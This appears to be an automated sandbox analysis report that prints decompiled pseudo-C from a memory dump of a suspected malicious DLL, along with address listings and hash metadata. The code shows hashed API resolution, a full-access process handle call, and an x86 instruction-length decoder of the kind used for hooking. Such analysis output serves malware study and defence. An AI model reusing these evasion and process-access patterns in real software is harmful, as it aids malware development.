									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E6FC5382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6FC4F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6FC4F8C4( *((intOrPtr*)(_t439 + 4)), E6FC4F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6FC4F8C4( *((intOrPtr*)(_t439 + 8)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6FC4F558( *((intOrPtr*)(_t439 + 8)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6FC4F8C4( *((intOrPtr*)(_t439 + 4)), E6FC4F568( *_t439) + 4);
								 *(E6FC4F558( *((intOrPtr*)(_t439 + 4)), E6FC4F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6FC4F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6FC52F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6FC4F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6FC4F8C4( *((intOrPtr*)(_t439 + 8)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6FC4F558( *((intOrPtr*)(_t439 + 8)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6FC4F558(_t439 + 0x28,  *(_t439 + 0x70));
										E6FC4F8C4( *((intOrPtr*)(_t439 + 4)), E6FC4F568( *_t439) + 4);
										 *(E6FC4F558( *((intOrPtr*)(_t439 + 4)), E6FC4F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6FC4F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6FC4F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6FC4F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6FC4F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E6FC5382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6FC4F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6FC4F8C4( *((intOrPtr*)(_t439 + 4)), E6FC4F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6FC52F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6FC4F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6FC4F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6FC4F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6FC4F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6FC4F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E6FC5382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6FC4F8C4( *((intOrPtr*)(_t439 + 8)), E6FC4F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6FC4F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6fc4a5ae
0x6fc4a5b0
0x6fc4a5bb
0x6fc4a5c1
0x6fc4a5c5
0x6fc4a5ca
0x6fc4a5d0
0x6fc4a5e0
0x00000000
0x6fc4a5e2
0x6fc4a5e2
0x6fc4a5ed
0x6fc4a5ed
0x6fc4ab6b
0x6fc4ab6d
0x6fc4ab6e
0x6fc4abad
0x6fc4abb1
0x6fc4abbf
0x6fc4abcd
0x6fc4abcd
0x6fc4abb8
0x6fc4abd3
0x6fc4abd8
0x00000000
0x6fc4abd8
0x6fc4abbc
0x6fc4abbd
0x00000000
0x6fc4a5f7
0x6fc4a5f7
0x6fc4a5fb
0x6fc4a702
0x6fc4a702
0x6fc4a707
0x6fc4a818
0x6fc4a81c
0x6fc4a821
0x6fc4a825
0x6fc4a94f
0x6fc4a951
0x6fc4a955
0x6fc4a95e
0x6fc4a967
0x6fc4a96b
0x6fc4a974
0x6fc4a97b
0x6fc4a97c
0x6fc4a980
0x6fc4a984
0x6fc4a988
0x6fc4a98a
0x6fc4aaf4
0x6fc4aaf4
0x6fc4aafc
0x6fc4ab14
0x6fc4ab16
0x6fc4ab18
0x6fc4ab52
0x6fc4ab52
0x6fc4ab54
0x6fc4ab54
0x6fc4ab57
0x6fc4ab72
0x6fc4ab86
0x6fc4ab89
0x6fc4ab8e
0x6fc4ab99
0x6fc4ab9a
0x6fc4ab9d
0x6fc4ab9f
0x6fc4aba8
0x00000000
0x6fc4aba8
0x6fc4ab59
0x6fc4ab5d
0x6fc4ab66
0x00000000
0x6fc4ab66
0x6fc4ab29
0x6fc4ab39
0x6fc4ab3d
0x6fc4ab3d
0x6fc4ab40
0x6fc4ab43
0x6fc4ab46
0x6fc4ab4c
0x00000000
0x00000000
0x00000000
0x6fc4ab4e
0x6fc4a992
0x6fc4a992
0x6fc4a994
0x6fc4a998
0x6fc4a99d
0x6fc4a99f
0x6fc4a9a3
0x6fc4a9a6
0x6fc4a9ae
0x6fc4a9b0
0x00000000
0x00000000
0x6fc4a9c7
0x6fc4a9e2
0x6fc4a9e4
0x6fc4a9f7
0x6fc4a9f9
0x6fc4a9fb
0x6fc4aa16
0x6fc4aa16
0x6fc4aa1a
0x6fc4aa1c
0x00000000
0x00000000
0x6fc4aa1e
0x6fc4aa21
0x6fc4aa42
0x6fc4aa61
0x6fc4aa67
0x6fc4aa6a
0x6fc4aa6f
0x6fc4aa70
0x6fc4aa74
0x00000000
0x00000000
0x6fc4aa7c
0x6fc4aa7c
0x6fc4aa7e
0x6fc4aa8a
0x6fc4aa96
0x6fc4aaa0
0x6fc4aaa3
0x6fc4aaa6
0x6fc4aaaa
0x6fc4aab1
0x6fc4aab5
0x6fc4aab9
0x6fc4aaba
0x6fc4aabe
0x6fc4aac3
0x6fc4aac8
0x6fc4aacc
0x6fc4aad0
0x6fc4aad6
0x6fc4aadc
0x6fc4aae2
0x6fc4aae8
0x6fc4aaed
0x6fc4aaee
0x6fc4aaee
0x00000000
0x6fc4aa7e
0x00000000
0x6fc4aa21
0x6fc4a9ff
0x6fc4aa10
0x6fc4aa12
0x6fc4aa14
0x00000000
0x00000000
0x00000000
0x6fc4aa14
0x6fc4aa27
0x00000000
0x6fc4aa27
0x6fc4a82b
0x6fc4a82e
0x6fc4a830
0x00000000
0x00000000
0x6fc4a838
0x6fc4a838
0x6fc4a83a
0x6fc4a83a
0x6fc4a84b
0x6fc4a84d
0x6fc4a850
0x00000000
0x00000000
0x6fc4a946
0x6fc4a947
0x6fc4a949
0x00000000
0x00000000
0x00000000
0x6fc4a949
0x6fc4a856
0x6fc4a859
0x6fc4a863
0x6fc4a868
0x6fc4a86a
0x6fc4a870
0x6fc4a877
0x6fc4a87b
0x6fc4a880
0x6fc4a884
0x6fc4acbf
0x6fc4acd3
0x6fc4acf6
0x6fc4acfb
0x6fc4acfb
0x6fc4a89b
0x6fc4a8a0
0x6fc4a8a0
0x6fc4a8a0
0x6fc4a8a0
0x6fc4a8a6
0x6fc4a8ab
0x6fc4a8ad
0x6fc4a8b2
0x6fc4a8b9
0x6fc4a8be
0x6fc4a8c0
0x6fc4ac7d
0x6fc4ac8e
0x6fc4aca8
0x6fc4acad
0x6fc4acad
0x6fc4a8d6
0x6fc4a8db
0x6fc4a8db
0x6fc4a8db
0x6fc4a8db
0x6fc4a8ef
0x6fc4a90d
0x6fc4a912
0x6fc4a922
0x6fc4a93f
0x6fc4a941
0x6fc4a941
0x00000000
0x6fc4a859
0x6fc4a70f
0x6fc4a70f
0x6fc4a711
0x6fc4a718
0x6fc4a726
0x6fc4a728
0x6fc4a72b
0x6fc4a732
0x6fc4a734
0x6fc4a765
0x6fc4a774
0x6fc4a776
0x6fc4a778
0x6fc4a796
0x6fc4a798
0x6fc4a79a
0x6fc4a7ad
0x6fc4a7cc
0x6fc4a7d2
0x6fc4a7d5
0x6fc4a7ec
0x6fc4a808
0x6fc4a80a
0x6fc4a80a
0x6fc4a80a
0x6fc4a80a
0x6fc4a79a
0x00000000
0x6fc4a778
0x6fc4a738
0x6fc4a738
0x6fc4a73a
0x6fc4a74b
0x6fc4a74d
0x6fc4a74f
0x00000000
0x00000000
0x6fc4a75b
0x6fc4a75c
0x6fc4a763
0x00000000
0x00000000
0x00000000
0x6fc4a763
0x6fc4a751
0x6fc4a754
0x00000000
0x00000000
0x6fc4a80d
0x6fc4a80d
0x6fc4a80e
0x6fc4a80e
0x00000000
0x6fc4a601
0x6fc4a603
0x6fc4a603
0x6fc4a605
0x6fc4a60c
0x6fc4a61a
0x6fc4a61c
0x6fc4a620
0x6fc4a624
0x6fc4a626
0x6fc4a654
0x6fc4a657
0x6fc4a65c
0x6fc4a660
0x6fc4a665
0x6fc4a66c
0x6fc4a671
0x6fc4a673
0x6fc4ac3a
0x6fc4ac4b
0x6fc4ac6b
0x6fc4ac70
0x6fc4ac70
0x6fc4a689
0x6fc4a68e
0x6fc4a68e
0x6fc4a68e
0x6fc4a68e
0x6fc4a6a0
0x6fc4a6a2
0x6fc4a6a4
0x6fc4a6b5
0x6fc4a6b5
0x6fc4a6bb
0x6fc4a6c0
0x6fc4a6c4
0x6fc4a6ca
0x6fc4a6d1
0x6fc4a6d6
0x6fc4a6d8
0x6fc4abee
0x6fc4abff
0x6fc4ac20
0x6fc4ac25
0x6fc4ac25
0x6fc4a6ef
0x6fc4a6f4
0x6fc4a6f4
0x6fc4a6f4
0x6fc4a6f4
0x6fc4a6f7
0x6fc4a6f7
0x00000000
0x6fc4a6f7
0x6fc4a62a
0x6fc4a62a
0x6fc4a62c
0x6fc4a63d
0x6fc4a63f
0x6fc4a641
0x00000000
0x00000000
0x6fc4a64d
0x6fc4a64e
0x6fc4a652
0x00000000
0x00000000
0x00000000
0x6fc4a652
0x6fc4a643
0x6fc4a646
0x00000000
0x00000000
0x6fc4a6f8
0x6fc4a6f8
0x6fc4a6f9
0x6fc4a6f9
0x00000000
0x6fc4a605
0x6fc4a5fb

Strings

, xrefs: 6FC4ABB3

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: bb4dd5f9a424defa75b1299a950eb03f6b82fe26bb1687a51fbc5715ce0fbcf4
Instruction ID: 3cce3bc7d1dd4c9c49380e1843717d60652d2f6816298178604bf9a7ae30ba31
Opcode Fuzzy Hash: bb4dd5f9a424defa75b1299a950eb03f6b82fe26bb1687a51fbc5715ce0fbcf4
Instruction Fuzzy Hash: 6B126A719083059FD715DF24C980A6EB7B5EFD5714F008A29E8A9972E4FB30E909CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6FC592DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6FC592DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6FC535D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6fc592e3
0x6fc592e7
0x6fc592f3
0x6fc592f7
0x6fc592fb
0x6fc59300
0x6fc59303
0x6fc59305
0x6fc59307
0x6fc59307
0x6fc5930a
0x6fc59310
0x6fc59388
0x6fc5938c
0x6fc5938f
0x6fc5938f
0x6fc59392
0x00000000
0x6fc59392
0x6fc59317
0x6fc5937f
0x6fc59383
0x00000000
0x6fc59383
0x6fc5931e
0x6fc59377
0x6fc5937a
0x00000000
0x6fc5937a
0x6fc59323
0x6fc59361
0x6fc59368
0x6fc5936b
0x6fc59334
0x6fc59334
0x6fc5933a
0x00000000
0x00000000
0x6fc5933f
0x6fc59359
0x6fc5935c
0x00000000
0x6fc5935c
0x6fc59344
0x00000000
0x6fc59346
0x6fc5934a
0x6fc5934d
0x00000000
0x6fc5934d
0x6fc59344
0x6fc59395
0x6fc59395
0x6fc59395
0x6fc5939e
0x6fc593a7
0x6fc593aa
0x6fc593ad
0x6fc593b0
0x6fc593b3
0x6fc593b9
0x6fc593fb
0x6fc593fe
0x6fc593ff
0x6fc59406
0x6fc59409
0x6fc593bb
0x6fc593bf
0x6fc593c9
0x6fc593d0
0x6fc593d2
0x6fc593eb
0x6fc593ee
0x6fc593ee
0x6fc593d0
0x6fc59411
0x6fc59414
0x6fc59417
0x6fc5941b
0x6fc5941f
0x6fc59429
0x6fc5942d
0x6fc59437
0x6fc59440
